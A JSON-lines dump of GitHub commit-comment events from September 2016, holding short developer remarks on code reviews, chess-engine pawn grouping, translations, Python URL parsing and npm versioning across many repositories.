{"id":"4514361506","type":"CommitCommentEvent","actor":{"login":"ljacqu"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":18894223,"position":null,"line":null,"path":null,"commit_id":"8327421dd41ea730bcc1fe76d0f9ea6c41d5bcf4","created_at":"2016-09-04T20:42:27Z","updated_at":"2016-09-04T20:42:27Z","body":"@DardBrinza – thank you :)"}},"created_at":"2016-09-04T20:42:27Z"}
{"id":"4514363973","type":"CommitCommentEvent","actor":{"login":"surminus"},"repo":{"name":"NotRossKemp/stuff"},"payload":{"comment":{"id":18894224,"position":null,"line":null,"path":null,"commit_id":"2195f2d7d113f338af3129ae69e26bf210b37763","created_at":"2016-09-04T20:44:14Z","updated_at":"2016-09-04T20:44:14Z","body":"As an example, you could just do:\r\n```\r\n#!/usr/bin/env python\r\nip_address = '8.8.8.8'\r\ndomain_url = 'mypulsant.com'\r\nurl = ip_address.replace('.', '_')\r\nprint url + '-' + domain_url\r\n```\r\n\r\nResults:\r\n```\r\n🐃  ~/dev/stuff git:(master) ✗ ./playtime.py\r\n8_8_8_8-mypulsant.com\r\n```\r\n\r\nDepending what you want to achieve this could be an interesting way to learn python (something I should probably do as well). Would be happy to learn a way of doing this stuff together!"}},"created_at":"2016-09-04T20:44:14Z"}
{"id":"4514369172","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18894226,"position":null,"line":null,"path":null,"commit_id":"df66d6ef4a8c1ba4a30aab3f42bf5ebf3f70ffda","created_at":"2016-09-04T20:47:38Z","updated_at":"2016-09-04T20:47:38Z","body":"Please check **v1.5** and report back ..."}},"created_at":"2016-09-04T20:47:38Z"}
{"id":"4514369676","type":"CommitCommentEvent","actor":{"login":"bantuist"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18894227,"position":84,"line":84,"path":"scripts/album.js","commit_id":"c91e5ede35b588f83fbd9c26b20628d9fc9b70b5","created_at":"2016-09-04T20:47:57Z","updated_at":"2016-09-04T20:47:57Z","body":"Does it make a difference whether I put the event listener inside or outside of the onload function?"}},"created_at":"2016-09-04T20:47:57Z"}
{"id":"4514370579","type":"CommitCommentEvent","actor":{"login":"deshipu"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18894230,"position":14,"line":110,"path":"esp8266/modpybhspi.c","commit_id":"dba40afa706a1ac4b102dceba217844dc1540ce7","created_at":"2016-09-04T20:48:31Z","updated_at":"2016-09-04T20:48:31Z","body":"I'm very happy doing \"last mile\" changes to my patches. I'm relatively new to C, and I hope to learn some good practices along the way. Code reviews are a great way to do that. I think it really pays both for the project and for the programmer to spend extra time on a patch before it is merged, even if all the suggestions seem like nit picking. I would never want to go back to developing without code review, doing all my commits directly myself.\r\n\r\nI'm really sorry if it seems to you that I'm not willing to improve my patches. That's certainly not my intention. I do have problems with some non-technical comments, and I don't always understand the suggestions that you are making."}},"created_at":"2016-09-04T20:48:31Z"}
{"id":"4514370644","type":"CommitCommentEvent","actor":{"login":"loveGhb"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":18894231,"position":null,"line":null,"path":null,"commit_id":"bc9d67abbd7f2d42c028ead9f5a9d9ad73c31d85","created_at":"2016-09-04T20:48:34Z","updated_at":"2016-09-04T20:48:34Z","body":"**sgdc3** thanks, I needed the opinion of an intelligent man to go for upgrade to Java 8"}},"created_at":"2016-09-04T20:48:34Z"}
{"id":"4514370664","type":"CommitCommentEvent","actor":{"login":"Trolley33"},"repo":{"name":"Trolley33/fitness-tracker"},"payload":{"comment":{"id":18894232,"position":null,"line":null,"path":null,"commit_id":"a2ff52bbcc252f2e02fd673f314128f8930835bd","created_at":"2016-09-04T20:48:35Z","updated_at":"2016-09-04T20:48:35Z","body":"As a side note the admin deletion features + deleting own account features are now live."}},"created_at":"2016-09-04T20:48:35Z"}
{"id":"4514371417","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18894235,"position":null,"line":null,"path":null,"commit_id":"ca526000f65603557e98fd3b0dbd98e7ad964ac8","created_at":"2016-09-04T20:49:10Z","updated_at":"2016-09-04T20:49:10Z","body":"> b) Step # 2 is a bit heavy.\n\nIt is, but maybe not that much...\nOf course it can be optimized, e.g. we might start with a \"phalanx\" instead of \na single pawn when we know we have one (the initial position is almost the \nworst case scenario, especially if we start from the rook pawns!), or look at \ncentral files first and only if they have no pawns look at the entire board... \nAlso when there are not many pawns we will have less iterations (and a very \nhigh pawn hash hit ratio anyway...).\n"}},"created_at":"2016-09-04T20:49:10Z"}
{"id":"4514372498","type":"CommitCommentEvent","actor":{"login":"NotRossKemp"},"repo":{"name":"NotRossKemp/stuff"},"payload":{"comment":{"id":18894236,"position":null,"line":null,"path":null,"commit_id":"2195f2d7d113f338af3129ae69e26bf210b37763","created_at":"2016-09-04T20:49:58Z","updated_at":"2016-09-04T20:49:58Z","body":"Thats awesome thanks!\r\n\r\nyou are right, coding IS easier when you have others to share it with.\r\n\r\nThat looks like a proper solution to it, gonna play to make sure i have my environemnt good to run scripts too as kinda crap atm"}},"created_at":"2016-09-04T20:49:58Z"}
{"id":"4514373716","type":"CommitCommentEvent","actor":{"login":"hossein7427"},"repo":{"name":"hossein7427/hossein7427"},"payload":{"comment":{"id":18894237,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-04T20:50:51Z","updated_at":"2016-09-04T20:50:51Z","body":"hossein7427\r\n"}},"created_at":"2016-09-04T20:50:51Z"}
{"id":"4514374126","type":"CommitCommentEvent","actor":{"login":"Grazfather"},"repo":{"name":"snare/voltron"},"payload":{"comment":{"id":18894238,"position":6,"line":28,"path":"voltron/plugins/view/memory.py","commit_id":"4d0498c6887c241ab629afda78aeb41c27f6afbf","created_at":"2016-09-04T20:51:11Z","updated_at":"2016-09-04T20:51:11Z","body":"Shouldn't the help say to not track?"}},"created_at":"2016-09-04T20:51:11Z"}
{"id":"4514375608","type":"CommitCommentEvent","actor":{"login":"k0nserv"},"repo":{"name":"danger/danger"},"payload":{"comment":{"id":18894244,"position":12,"line":131,"path":"lib/danger/danger_core/plugins/dangerfile_gitlab_plugin.rb","commit_id":"580ce6b91f05c1289648c597d5ab8e73eda62929","created_at":"2016-09-04T20:52:11Z","updated_at":"2016-09-04T20:52:11Z","body":"Don't copy and paste kids"}},"created_at":"2016-09-04T20:52:11Z"}
{"id":"4514376330","type":"CommitCommentEvent","actor":{"login":"afragen"},"repo":{"name":"Ipstenu/wporg-plugin-guidelines"},"payload":{"comment":{"id":18894245,"position":2,"line":1,"path":"guideline-02.md","commit_id":"e2fd57b7e5038f4fb0ecc0d7dab874e1309a7109","created_at":"2016-09-04T20:52:44Z","updated_at":"2016-09-04T20:52:44Z","body":"utilize"}},"created_at":"2016-09-04T20:52:44Z"}
{"id":"4514377406","type":"CommitCommentEvent","actor":{"login":"Ralf9"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":18894247,"position":215,"line":3419,"path":"FHEM/00_SIGNALduino.pm","commit_id":"b760d47fc6af076cef870413706636e5d63cc556","created_at":"2016-09-04T20:53:32Z","updated_at":"2016-09-04T20:53:32Z","body":"Mir ist nicht so richtig klar, wozu bei der WH1080 überhaupt das Attribut WS09_CRCAUS notwendig ist.\r\nBei der Entwicklung ist die Möglichkeit den crc-check abschalten zu können interessant. Damit läßt sich erkennen, daß das crc abschalten eigentlich keinen Sinn macht. Bei einem crc Fehler ist in der Regel irgendein Wert fehlerhaft."}},"created_at":"2016-09-04T20:53:32Z"}
{"id":"4514380551","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18894253,"position":null,"line":null,"path":null,"commit_id":"ca526000f65603557e98fd3b0dbd98e7ad964ac8","created_at":"2016-09-04T20:55:50Z","updated_at":"2016-09-04T20:55:50Z","body":"@lucabrivio Seems reasonable to me.  Special care might have to be taken when shifting pawns on the edges of the board?\r\n@Rocky640 U r right it may be a bit heavy but then again pawns evals are cashed so it may b ok.\r\n\r\nI'm about to travel so please don't take my further lack of participation as lack of interest.  Good luck!"}},"created_at":"2016-09-04T20:55:50Z"}
{"id":"4514381207","type":"CommitCommentEvent","actor":{"login":"trenneman"},"repo":{"name":"trenneman/persistence-js"},"payload":{"comment":{"id":18894256,"position":35,"line":102,"path":"test/unit/entity-manager.spec.js","commit_id":"a7d3e5644831c39ff76e074444d2d452c9ac3652","created_at":"2016-09-04T20:56:18Z","updated_at":"2016-09-04T20:56:18Z","body":"No id"}},"created_at":"2016-09-04T20:56:18Z"}
{"id":"4514381407","type":"CommitCommentEvent","actor":{"login":"pfalcon"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18894257,"position":14,"line":110,"path":"esp8266/modpybhspi.c","commit_id":"dba40afa706a1ac4b102dceba217844dc1540ce7","created_at":"2016-09-04T20:56:26Z","updated_at":"2016-09-04T20:56:26Z","body":"No, I exactly don't want it to look as nit-picking or procrastinating somebody's patches. And open-source is all about cooperation, so as long as someone did their homework on useful patches well enough, but they're still not there, I'm happy to do my part on them. I hope you review those changes to see how yours can be done better in the future. Yes, ideally that should go thru code review too, and that's how I planned to do it 2 weeks ago. The current situation though is that I barely remembered about it in time for the release, so the talk is about it being done or not done at all.\r\n "}},"created_at":"2016-09-04T20:56:26Z"}
{"id":"4514383112","type":"CommitCommentEvent","actor":{"login":"SoufianeHub"},"repo":{"name":"SoufianeHub/github-fro-web-designers"},"payload":{"comment":{"id":18894260,"position":4,"line":29,"path":"index.html","commit_id":"d99a81bcd3e955a0056d0ce37e53ca470f682909","created_at":"2016-09-04T20:57:41Z","updated_at":"2016-09-04T20:57:41Z","body":"Don't worry I got this"}},"created_at":"2016-09-04T20:57:41Z"}
{"id":"4514383993","type":"CommitCommentEvent","actor":{"login":"vbarhatov"},"repo":{"name":"ibarhatov/HelloWorld"},"payload":{"comment":{"id":18894263,"position":24,"line":25,"path":"HelloWorld/src/com/company/Main.java","commit_id":"dfd2b2440868edcc949ff278eebd4577b959496b","created_at":"2016-09-04T20:58:20Z","updated_at":"2016-09-04T20:58:20Z","body":"Зачем умножать на 100?"}},"created_at":"2016-09-04T20:58:20Z"}
{"id":"4514385076","type":"CommitCommentEvent","actor":{"login":"calvintennant"},"repo":{"name":"d3/d3-path"},"payload":{"comment":{"id":18894264,"position":null,"line":null,"path":null,"commit_id":"c9467d77893461a10c368648754459a1e59f20c1","created_at":"2016-09-04T20:59:11Z","updated_at":"2016-09-04T20:59:11Z","body":"Does this leave out an interface for setting the start position? I guess just set `_x0` and `_y0` manually? "}},"created_at":"2016-09-04T20:59:11Z"}
{"id":"4514385768","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"MSF-Jarvis/KPSConnect"},"payload":{"comment":{"id":18894265,"position":null,"line":null,"path":null,"commit_id":"0d97775bf42a72959e354ba6684d5ba6aafc8128","created_at":"2016-09-04T20:59:42Z","updated_at":"2016-09-04T20:59:42Z","body":"Isn't working. @xdevs23, you see any obvious issue? "}},"created_at":"2016-09-04T20:59:42Z"}
{"id":"4514386353","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18894266,"position":null,"line":null,"path":null,"commit_id":"ca526000f65603557e98fd3b0dbd98e7ad964ac8","created_at":"2016-09-04T21:00:09Z","updated_at":"2016-09-04T21:00:09Z","body":"One more comment so that I'm clear of what should or should not be considered a group...\r\nA) Pawns on a2 and a3 only.  This IS a group.\r\nB) Pawns on a2 and b4 only.  This is NOT a group. Or rather IS two separate groups.\r\nCorrect?"}},"created_at":"2016-09-04T21:00:09Z"}
{"id":"4514388371","type":"CommitCommentEvent","actor":{"login":"vbarhatov"},"repo":{"name":"ibarhatov/HelloWorld"},"payload":{"comment":{"id":18894269,"position":5,"line":7,"path":"HelloWorld/src/com/company/StarPersons.java","commit_id":"dfd2b2440868edcc949ff278eebd4577b959496b","created_at":"2016-09-04T21:01:24Z","updated_at":"2016-09-04T21:01:24Z","body":"статические поля по Java Code Conventions пишутся прописными буквами в стиле `IT_IS_A_STATIC_FIELD`"}},"created_at":"2016-09-04T21:01:24Z"}
{"id":"4514389059","type":"CommitCommentEvent","actor":{"login":"asdine"},"repo":{"name":"asdine/storm"},"payload":{"comment":{"id":18894271,"position":null,"line":null,"path":null,"commit_id":"75b7df7a2274a463ac657057956d6c8a16e54694","created_at":"2016-09-04T21:01:54Z","updated_at":"2016-09-04T21:01:54Z","body":"Because of this conversation #72. To sum up, the JSON codec is much faster than gob with Storm (especially for decoding)"}},"created_at":"2016-09-04T21:01:54Z"}
{"id":"4514390489","type":"CommitCommentEvent","actor":{"login":"Mafii"},"repo":{"name":"IDPA-2016-NEAT-CNN/NEAT_Visualizer"},"payload":{"comment":{"id":18894272,"position":null,"line":null,"path":null,"commit_id":"575638563a55e85b5b261f1d148b6283716bddfe","created_at":"2016-09-04T21:02:57Z","updated_at":"2016-09-04T21:02:57Z","body":"Also added Newtonsoft.Json! 🙈 "}},"created_at":"2016-09-04T21:02:57Z"}
{"id":"4514391146","type":"CommitCommentEvent","actor":{"login":"frederikprijck"},"repo":{"name":"frederikprijck/Angular2"},"payload":{"comment":{"id":18894273,"position":5,"line":26,"path":"sample-app/app/person/person.service.ts","commit_id":"149a760568f9377bdbac750e6183cdfcd74772b2","created_at":"2016-09-04T21:03:27Z","updated_at":"2016-09-04T21:03:27Z","body":"Added mapping instead of casting as methods (`getFullName`) doesn't exist when casting."}},"created_at":"2016-09-04T21:03:27Z"}
{"id":"4514391853","type":"CommitCommentEvent","actor":{"login":"geeteshk"},"repo":{"name":"OpenMatter/Hyper"},"payload":{"comment":{"id":18894274,"position":null,"line":null,"path":null,"commit_id":"521369d85911cc94fc61c16e19db7677aaf28909","created_at":"2016-09-04T21:04:04Z","updated_at":"2016-09-04T21:04:04Z","body":"Noticeable build duration decrease by 1 whole minute. Going to keep the daemon enabled. "}},"created_at":"2016-09-04T21:04:04Z"}
{"id":"4514393164","type":"CommitCommentEvent","actor":{"login":"frederikprijck"},"repo":{"name":"frederikprijck/Angular2"},"payload":{"comment":{"id":18894276,"position":2,"line":1,"path":"sample-app/app/shared/components/orderby/order-by.model.ts","commit_id":"c77744e6c3b6b2123ed72f7918856e888282921e","created_at":"2016-09-04T21:05:04Z","updated_at":"2016-09-04T21:05:04Z","body":"I added a class instead of an interface as the plugin-typescript, used by systemjs, doesn't like files only containing interfaces."}},"created_at":"2016-09-04T21:05:04Z"}
{"id":"4514395498","type":"CommitCommentEvent","actor":{"login":"Jbarget"},"repo":{"name":"dwyl/learn-aws-lambda"},"payload":{"comment":{"id":18894278,"position":null,"line":null,"path":null,"commit_id":"093099c7ca0bf402b418485c9c29f001718e8671","created_at":"2016-09-04T21:06:49Z","updated_at":"2016-09-04T21:06:49Z","body":"associated with #79 "}},"created_at":"2016-09-04T21:06:49Z"}
{"id":"4514397060","type":"CommitCommentEvent","actor":{"login":"remipichon"},"repo":{"name":"assomaker/manifmaker"},"payload":{"comment":{"id":18894280,"position":null,"line":null,"path":null,"commit_id":"c7c572f6046927c5cae825a2e4206eb3d45d5cbf","created_at":"2016-09-04T21:08:06Z","updated_at":"2016-09-04T21:08:06Z","body":"Il reste un détail. En fonction de l'état de equipmentValidation, la section equipment est plus ou moins grande (si les equipements ne sont pas éditable, ne sont affichés que ceux ayant une quantité). Ce qui a pour effet de changer la taille de la page. Il faudrait mettre en place u scrollTo. \r\n\r\nJe trouve pas ca urgent, ca te va d'en faire une issue qu'on reporte à plus tard ? "}},"created_at":"2016-09-04T21:08:06Z"}
{"id":"4514397287","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18894281,"position":null,"line":null,"path":null,"commit_id":"ca526000f65603557e98fd3b0dbd98e7ad964ac8","created_at":"2016-09-04T21:08:16Z","updated_at":"2016-09-04T21:08:16Z","body":"For now we will consider 2 pawns p and q to belong to the same connected group if dist(p, q)==1\r\nSo\r\nA) this is one group\r\nB) this is 2 separate groups"}},"created_at":"2016-09-04T21:08:16Z"}
{"id":"4514397862","type":"CommitCommentEvent","actor":{"login":"uchouhan"},"repo":{"name":"optimis/optimis-cas-custom-code"},"payload":{"comment":{"id":18894283,"position":null,"line":null,"path":null,"commit_id":"2760df51e32ea99509e0d1c97bb9ff394e07800b","created_at":"2016-09-04T21:08:45Z","updated_at":"2016-09-04T21:08:45Z","body":"👍 "}},"created_at":"2016-09-04T21:08:45Z"}
{"id":"4514399423","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"hxim/Stockfish"},"payload":{"comment":{"id":18894285,"position":null,"line":null,"path":null,"commit_id":"f32db5877e07156dd22f5cf672fe40ebf72da0eb","created_at":"2016-09-04T21:09:58Z","updated_at":"2016-09-04T21:09:58Z","body":"Very interesting, yet somewhat difficult to follow ... however, good luck for LTC!"}},"created_at":"2016-09-04T21:09:58Z"}
{"id":"4514401127","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18894286,"position":null,"line":null,"path":null,"commit_id":"ca526000f65603557e98fd3b0dbd98e7ad964ac8","created_at":"2016-09-04T21:11:21Z","updated_at":"2016-09-04T21:11:21Z","body":"@lucabrivio \r\nI should have a functional and tested pawn group counter in a few hours (it is Sunday after all ;)\r\nI will do some speed comparison with current master and report performance."}},"created_at":"2016-09-04T21:11:21Z"}
{"id":"4514403313","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18894289,"position":null,"line":null,"path":null,"commit_id":"df66d6ef4a8c1ba4a30aab3f42bf5ebf3f70ffda","created_at":"2016-09-04T21:13:11Z","updated_at":"2016-09-04T21:13:11Z","body":":laughing: it doesn't. But like [**this**](https://github.com/manjaro/packages-community/commit/46debf7e85237e2c44bddb80f8e881fd507dd9d7)"}},"created_at":"2016-09-04T21:13:11Z"}
{"id":"4514403696","type":"CommitCommentEvent","actor":{"login":"csarrazi"},"repo":{"name":"propertyguru/CsaGuzzleBundle"},"payload":{"comment":{"id":18894290,"position":null,"line":null,"path":null,"commit_id":"5f92879c81e5207ada9474c08cd327f0ec2631cd","created_at":"2016-09-04T21:13:31Z","updated_at":"2016-09-04T21:13:31Z","body":"Hey! You might want to do a PR for this one! ;)\r\n\r\nCheers!"}},"created_at":"2016-09-04T21:13:31Z"}
{"id":"4514403858","type":"CommitCommentEvent","actor":{"login":"Ryuzaki-MrL"},"repo":{"name":"Cruel/freeShop"},"payload":{"comment":{"id":18894292,"position":11,"line":36,"path":"res/romfs/lang/pt.lang","commit_id":"23964294ed3fbdb9336cd53c39157716c1e1ea1c","created_at":"2016-09-04T21:13:39Z","updated_at":"2016-09-04T21:13:39Z","body":"Since it's referring to the \"chaves\" (keys), it should be \"encontradas\"."}},"created_at":"2016-09-04T21:13:39Z"}
{"id":"4514405080","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18894293,"position":null,"line":null,"path":null,"commit_id":"df66d6ef4a8c1ba4a30aab3f42bf5ebf3f70ffda","created_at":"2016-09-04T21:14:38Z","updated_at":"2016-09-04T21:14:38Z","body":"The ``NULL``  was probably the problem the whole time, already when comparing ``g_getenv (\"QT_STYLE_OVERRIDE\")``\r\nSeems it cannot be used in this context like that?"}},"created_at":"2016-09-04T21:14:38Z"}
{"id":"4514405122","type":"CommitCommentEvent","actor":{"login":"kampfschlaefer"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18894294,"position":null,"line":null,"path":null,"commit_id":"4745341c69772de5ddfee1f68e7421ad9d772b82","created_at":"2016-09-04T21:14:40Z","updated_at":"2016-09-04T21:14:40Z","body":"@vcunat hm, might be I was wrong. running another git-bisect now on 3b09cf7 to 5f6d842 (numbers from https://hydra.nixos.org/jobset/nixos/unstable-small/evals)…"}},"created_at":"2016-09-04T21:14:40Z"}
{"id":"4514405383","type":"CommitCommentEvent","actor":{"login":"dentarg"},"repo":{"name":"spaam/svtplay-dl"},"payload":{"comment":{"id":18894295,"position":5,"line":31,"path":"lib/svtplay_dl/fetcher/hls.py","commit_id":"bdf7a181ea8056c4ecb1c457961410f447714b59","created_at":"2016-09-04T21:14:55Z","updated_at":"2016-09-04T21:14:55Z","body":"did you mean to include the scheme here?\r\n\r\n```python\r\n>>> re.search(r'^(http[s]{0,1}://[^/]+)/', 'http://user:pass@example.org/foo').group(1)\r\n'http://user:pass@example.org'\r\n```\r\n\r\nI think you should use [`urlparse`](https://docs.python.org/2/library/urlparse.html) :-)\r\n\r\n```python\r\n>>> from urlparse import urlparse\r\n>>> urlparse('http://user:pass@example.org/foo')\r\nParseResult(scheme='http', netloc='user:pass@example.org', path='/foo', params='', query='', fragment='')\r\n>>> urlparse('http://user:pass@example.org/foo').hostname\r\n'example.org'\r\n```"}},"created_at":"2016-09-04T21:14:55Z"}
{"id":"4514407427","type":"CommitCommentEvent","actor":{"login":"Ryuzaki-MrL"},"repo":{"name":"Cruel/freeShop"},"payload":{"comment":{"id":18894296,"position":83,"line":217,"path":"res/romfs/lang/pt.lang","commit_id":"23964294ed3fbdb9336cd53c39157716c1e1ea1c","created_at":"2016-09-04T21:16:26Z","updated_at":"2016-09-04T21:16:26Z","body":"In this case, \"enviar\" is more cohesive."}},"created_at":"2016-09-04T21:16:26Z"}
{"id":"4514408330","type":"CommitCommentEvent","actor":{"login":"micheloosterhof"},"repo":{"name":"davegermiquet/cowrie"},"payload":{"comment":{"id":18894297,"position":null,"line":null,"path":null,"commit_id":"c693b8b3aa0a20dd1b147f01539e45cf0e048e30","created_at":"2016-09-04T21:17:10Z","updated_at":"2016-09-04T21:17:10Z","body":"Hi! I follow Twisted coding conventions, since Cowrie is mostly built on Twisted.\r\nSo if you could leave the double newlines in there, that would make it easier for me to accept patches as well. Run \"twistedchecker\" to verify your code against Twisted coding standards. "}},"created_at":"2016-09-04T21:17:10Z"}
{"id":"4514408832","type":"CommitCommentEvent","actor":{"login":"ivannieto"},"repo":{"name":"shivam5992/PyScrapper"},"payload":{"comment":{"id":18894299,"position":null,"line":null,"path":null,"commit_id":"02729c3a653cd9e8b923a748d6468bb44f527388","created_at":"2016-09-04T21:17:33Z","updated_at":"2016-09-04T21:17:33Z","body":"@shivam5992 I don't know if you should merge this PR. I've added a LICENSE for the project. Maybe should I rebase the repo and work it my way, so you won't have to merge everytime needed? (Of course you'll be credited for sure, as you can read it in LICENSE and README files)."}},"created_at":"2016-09-04T21:17:33Z"}
{"id":"4514411371","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18894303,"position":null,"line":null,"path":null,"commit_id":"810c3d4336d0db7855d1f99e0d96a7d1529f93ea","created_at":"2016-09-04T21:19:42Z","updated_at":"2016-09-04T21:19:42Z","body":"See discussion there : https://github.com/lucabrivio/Stockfish/compare/master...pawn_groups"}},"created_at":"2016-09-04T21:19:42Z"}
{"id":"4514411568","type":"CommitCommentEvent","actor":{"login":"Martii"},"repo":{"name":"QupZilla/qupzilla"},"payload":{"comment":{"id":18894304,"position":null,"line":null,"path":null,"commit_id":"d8354016563eafe6dc473969cbe1d10bc0043285","created_at":"2016-09-04T21:19:52Z","updated_at":"2016-09-04T21:19:52Z","body":"Ref(s)\r\n* #2066"}},"created_at":"2016-09-04T21:19:52Z"}
{"id":"4514411736","type":"CommitCommentEvent","actor":{"login":"Martii"},"repo":{"name":"QupZilla/qupzilla"},"payload":{"comment":{"id":18894306,"position":null,"line":null,"path":null,"commit_id":"35657e60057c7a0337b55a62e414db9d801a2c30","created_at":"2016-09-04T21:20:00Z","updated_at":"2016-09-04T21:20:00Z","body":"Ref(s)\r\n* #2066"}},"created_at":"2016-09-04T21:20:00Z"}
{"id":"4514414343","type":"CommitCommentEvent","actor":{"login":"vutran"},"repo":{"name":"adnasa/dext-giphy-plugin"},"payload":{"comment":{"id":18894308,"position":null,"line":null,"path":null,"commit_id":"3d5ffd6b8cd09426c130c2209d7790dc2fb6c52d","created_at":"2016-09-04T21:22:04Z","updated_at":"2016-09-04T21:22:04Z","body":"You can also do this with `npm version <type>` following the semver types. Should shave you a few seconds.\r\n\r\nMake a bump commit\r\n\r\n```bash\r\n$ npm version major # x.0.0\r\n\r\n$ npm version minor # 0.x.0\r\n\r\n$ npm version patch # 0.0.x\r\n```\r\n\r\nThen publish...\r\n\r\n```bash\r\n$ npm publish\r\n```\r\n\r\nLooking forward for more plugins from you within the next hour. 😄  "}},"created_at":"2016-09-04T21:22:04Z"}
{"id":"4514414826","type":"CommitCommentEvent","actor":{"login":"Sitmobedaf"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":18894309,"position":null,"line":null,"path":null,"commit_id":"8327421dd41ea730bcc1fe76d0f9ea6c41d5bcf4","created_at":"2016-09-04T21:22:25Z","updated_at":"2016-09-04T21:22:25Z","body":"Bad translate"}},"created_at":"2016-09-04T21:22:25Z"}
{"id":"4514416047","type":"CommitCommentEvent","actor":{"login":"dkmiller"},"repo":{"name":"dkmiller/Crack-Coding-Interview"},"payload":{"comment":{"id":18894310,"position":null,"line":null,"path":null,"commit_id":"ea4ab0f5afc198fee15d48df47355ddefff1d586","created_at":"2016-09-04T21:23:24Z","updated_at":"2016-09-04T21:23:24Z","body":"Yes, it should all run just fine. Thanks dude!"}},"created_at":"2016-09-04T21:23:24Z"}
{"id":"4514416932","type":"CommitCommentEvent","actor":{"login":"aashikhmin82"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18894311,"position":8,"line":8,"path":"ALGORYTHMS/task2/randoms_list.h","commit_id":"8ee8f7f620cec9f4139b8f0a48eb14dc88e377e0","created_at":"2016-09-04T21:24:09Z","updated_at":"2016-09-04T21:24:09Z","body":"Я за две недели постоянно использовал эту функцию и ещё планирую, так что решил сделать класс"}},"created_at":"2016-09-04T21:24:09Z"}
{"id":"4514417159","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18894312,"position":null,"line":null,"path":null,"commit_id":"ca526000f65603557e98fd3b0dbd98e7ad964ac8","created_at":"2016-09-04T21:24:19Z","updated_at":"2016-09-04T21:24:19Z","body":"I have an implementation there, which uses the fact that in a graph G=(E,V) the number of connected components is C=E-V \r\nhttps://github.com/snicolet/Stockfish/compare/c5828c4...507c9d6"}},"created_at":"2016-09-04T21:24:19Z"}
{"id":"4514419808","type":"CommitCommentEvent","actor":{"login":"mwvent"},"repo":{"name":"mwvent/WattzMCPE-MyPlot"},"payload":{"comment":{"id":18894314,"position":null,"line":null,"path":null,"commit_id":"45de6433908cf9d50c62e7331e223d6dd940835d","created_at":"2016-09-04T21:26:21Z","updated_at":"2016-09-04T21:26:21Z","body":"Yes the mysqli interface is unchanged as far as I am aware. This was frustrating to track down I had to use a debugger to see what was causing the segfault and found that the same SELECT query from this plugin always caused the crash - something to do with MALLOC if I remember rightly.\r\nI wrote a script to stress test PHP7 by running the query in an infinite loop for hours without issues however, so lack of reproducibility prevented me making a coherent bug report it only crashes in the context of running as a Pocketmine plugin.\r\nLoading the plots into an array instead completely solved the issues however, I have never seen a segfault since this change, and it doesn't take much RAM on my server with 36,669 plots registered - although if I wasn't limiting the amount of plots users can claim by using the voting system the number may be a lot higher and this solution might need a rethink. "}},"created_at":"2016-09-04T21:26:21Z"}
{"id":"4514421802","type":"CommitCommentEvent","actor":{"login":"aashikhmin82"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18894317,"position":44,"line":44,"path":"ALGORYTHMS/task2/reverse_list.cpp","commit_id":"8ee8f7f620cec9f4139b8f0a48eb14dc88e377e0","created_at":"2016-09-04T21:28:00Z","updated_at":"2016-09-04T21:28:00Z","body":"Да, проверок я не делал, т.к. решил не писать до конца законченную программу."}},"created_at":"2016-09-04T21:28:00Z"}
{"id":"4514422330","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18894319,"position":null,"line":null,"path":null,"commit_id":"a5c656442ce557eace055612492b59914d3360e2","created_at":"2016-09-04T21:28:27Z","updated_at":"2016-09-04T21:28:27Z","body":"Related to: backdrop/backdrop-issues#2124 "}},"created_at":"2016-09-04T21:28:27Z"}
{"id":"4514422617","type":"CommitCommentEvent","actor":{"login":"ccrama"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18894320,"position":null,"line":null,"path":null,"commit_id":"6bbc398474614c606559ce493470e2ad90cea8c8","created_at":"2016-09-04T21:28:39Z","updated_at":"2016-09-04T21:28:39Z","body":"If it is easy to implement, I'd say that is a good idea :)"}},"created_at":"2016-09-04T21:28:39Z"}
{"id":"4514423265","type":"CommitCommentEvent","actor":{"login":"aashikhmin82"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18894321,"position":76,"line":76,"path":"ALGORYTHMS/task2/reverse_list.cpp","commit_id":"8ee8f7f620cec9f4139b8f0a48eb14dc88e377e0","created_at":"2016-09-04T21:29:10Z","updated_at":"2016-09-04T21:29:10Z","body":"Сильное замечание, а мне так нравился этот кусочек кода. ((("}},"created_at":"2016-09-04T21:29:10Z"}
